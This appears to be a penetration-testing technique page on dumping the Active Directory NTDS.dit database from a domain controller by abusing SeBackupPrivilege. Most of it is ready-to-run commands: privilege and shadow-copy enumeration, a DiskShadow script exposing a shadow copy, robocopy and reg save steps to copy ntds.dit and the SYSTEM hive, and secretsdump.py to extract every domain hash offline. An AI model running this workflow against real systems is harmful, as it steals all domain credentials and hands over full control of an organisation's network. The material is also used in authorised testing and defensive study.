NTDS.dit extraction uses SeBackupPrivilege to copy the Active Directory database from a domain controller.
This is high-impact credential access. On a domain controller, successful extraction should be treated as domain compromise until proven otherwise.
When enumerating NTDS extraction opportunities, try to identify:
- Domain controller context
SeBackupPrivilegein the current token- Ability to create or access a shadow copy
- Writable staging directory
SYSTEMhive export path- Offline extraction workflow
Enumeration
Confirm domain controller role:
wmic computersystem get domainrole
Confirm the privilege:
whoami /priv
Check for existing shadow copies:
vssadmin list shadows
Interesting findings include:
- Domain role
4or5 SeBackupPrivilegepresent- Shadow copy can expose locked files
C:\Windows\NTDS\ntds.ditexists
Because NTDS.dit is locked while Active Directory is running, copy from a shadow copy instead of the live path.
Exploit
Create a DiskShadow script:
set context persistent nowriters
set metadata C:\Windows\Temp\shadow.cab
begin backup
add volume C: alias cdrive
create
expose %cdrive% P:
end backup
Run it:
diskshadow /s C:\Users\Public\diskshadow.txt
Copy NTDS.dit from the exposed shadow copy:
robocopy /B P:\Windows\NTDS C:\Users\Public ntds.dit
Copy the SYSTEM hive:
reg save HKLM\SYSTEM C:\Users\Public\system.save
Extract hashes offline:
secretsdump.py -ntds ntds.dit -system system.save LOCAL